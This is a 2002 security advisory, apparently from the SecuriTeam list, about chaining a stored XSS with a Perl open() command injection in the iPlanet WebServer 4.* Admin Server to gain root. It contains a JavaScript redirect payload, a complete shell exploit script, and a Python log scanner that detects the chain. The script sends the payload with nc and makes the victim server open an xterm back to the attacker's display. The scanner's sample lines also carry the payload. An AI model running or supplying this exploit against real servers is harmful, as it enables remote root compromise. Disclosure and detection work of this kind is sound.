[NEWS] iPlanet WebServer Vulnerable to Remote Root Compromise

From: support@securiteam.com
Date: 11/21/02

    From: support@securiteam.com
    To: list@securiteam.com
    Date: 21 Nov 2002 12:16:16 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      iPlanet WebServer Vulnerable to Remote Root Compromise
    ------------------------------------------------------------------------

    SUMMARY

    Under certain circumstances an attacker can execute commands (usually as
    root) by combining two security vulnerabilities in iPlanet Web Server 4.*
    up to SP11 (NG-XSS).

    These two vulnerabilities are:
     - Insecure open() calls in the Admin Server Perl scripts
     - Cross Site Scripting

    The only additional requirement is to persuade the Administrator, through
    social engineering, to review the logs within iPlanet Admin Server.

    This vulnerability cannot be exploited on 6.* versions because the XSS was
    silently fixed in those releases.

    DETAILS

    Vulnerable systems:
     * iPlanet WebServer version 4.* up to SP11

    Considered on its own, neither vulnerability allows command execution on
    the iPlanet Web Server: the XSS payload only hijacks the browser, and the
    vulnerable Perl script is protected by an authentication scheme.

    iPlanet Web Server suffers from an XSS vulnerability when the Administrator
    reviews the error logs through iPlanet Admin Server. The XSS triggers once
    the Administrator has successfully logged on to the Admin Server.

    The trick is not to exploit the open() Perl vulnerability directly, but to
    use the XSS to redirect the Administrator's browser to the URL that causes
    the open() command injection. Since the Administrator is already
    authenticated, the authentication scheme is bypassed.

    We will use the following JavaScript code:
    <script>
    window.location="/https-admserv/bin/perl/importInfo?dir=|<command>%00";
    </script>
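    From the defender's side, the following is an added example (not part of the advisory and not NGSEC's code) that scans web-server error-log lines for the two halves of this chain: a script tag stored in a requested path, and an importInfo dir= argument carrying a pipe or NUL. The log-line layout and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample error-log lines (not taken from the advisory). The layout,
# "for host <client> trying to GET <path>, <message>", is an assumption.
SAMPLE_LOG = """\
[21/Nov/2002:12:16:16] warning: for host 192.0.2.5 trying to GET /index.html, file not found
[21/Nov/2002:12:16:17] warning: for host 192.0.2.9 trying to GET /%3Cscript%3Ewindow.location=%22/https-admserv/bin/perl/importInfo%3Fdir=|/usr/openwin/bin/xterm+-display+192.0.2.9:0%2500%22;%3C/script%3E, file not found
[21/Nov/2002:12:16:18] warning: for host 192.0.2.7 trying to GET /https-admserv/bin/perl/importInfo?dir=logs, file not found
[21/Nov/2002:12:16:19] warning: for host 192.0.2.8 trying to GET /https-admserv/bin/perl/importInfo?dir=|id%00, file not found
"""

REQUEST_RE = re.compile(r"for host (\S+) trying to (?:GET|POST|HEAD) (\S+?),")
SCRIPT_RE = re.compile(r"<\s*script|javascript:", re.IGNORECASE)
IMPORTINFO_RE = re.compile(r"/importInfo\?[^ ]*?\bdir=([^&]*)", re.IGNORECASE)


def classify(path):
    """Return the reasons a requested path looks like the chained attack, or []."""
    # Decode twice: the payload double-encodes the NUL (%2500) so that it is
    # still %00 when the web server hands it on to the Perl script.
    decoded = unquote(unquote(path))
    reasons = []
    if SCRIPT_RE.search(decoded):
        # Markup written into the error log that the Admin Server will later
        # render unescaped for the Administrator (the stored-XSS half).
        reasons.append("script tag in requested path")
    m = IMPORTINFO_RE.search(decoded)
    if m:
        dir_arg = m.group(1)
        # A leading or trailing pipe turns a two-argument open() into a
        # command; the NUL truncates whatever the script appends to it.
        if dir_arg.startswith("|") or dir_arg.endswith("|") or "\x00" in dir_arg:
            reasons.append("importInfo dir= contains pipe or NUL")
    return reasons


def scan(log_text):
    """Return a list of (client_host, reasons) for each suspicious request."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        host, path = m.groups()
        reasons = classify(path)
        if reasons:
            findings.append((host, reasons))
    return findings


if __name__ == "__main__":
    for host, reasons in scan(SAMPLE_LOG):
        print(host, "->", "; ".join(reasons))
```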

    Recommendations:
    Avoid using iPlanet's Admin Server until Sun releases a patch for these
    vulnerabilities. Alternatively, upgrade to iPlanet v6.*.

    Exploit:
    #!/bin/sh
    #
    # iPlanet Remote root exploit
    # Tested versions: 4.* up to SP11
    #
    # By: Fermín J. Serna CTO, NGSEC
    # http://www.ngsec.com <fjserna@ngsec.com>
    #
    # Madrid, 09/10/2002

    echo "iPlanet (4.* up to SP11) Remote root exploit by Fermin J. Serna CTO, NGSEC"
    echo "http://www.ngsec.com <fjserna@ngsec.com>"
    echo

    if [ $# != "3" ]
    then
     echo "Usage: $0 <Web_Server> <Web_port> <IP_to_send_xterm>"
     exit
    fi

    echo "1.- Setting xhost +$1"
    xhost +$1
    echo

    echo "2.- Building XSS string:"
    CADENA="<script>window.location=\"/https-admserv/bin/perl/importInfo%3Fdir=|/usr/openwin/bin/xterm+-display+$3:0%2500\";</script>"
    echo $CADENA
    echo

    echo "3.- Sending HTTP request:"
    SEND="GET /$CADENA HTTP/1.0"
    echo "$SEND"
    (echo "$SEND"; echo "Host: $1"; echo; echo) | nc $1 $2
    echo
    echo

    echo "4.- Time to wait for the xterm :P. Admin should review Web Server logs using Admin Server Tool."
    echo

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:fjserna@ngsec.com> Fermín J.
    Serna of Next Generation Security Technologies.

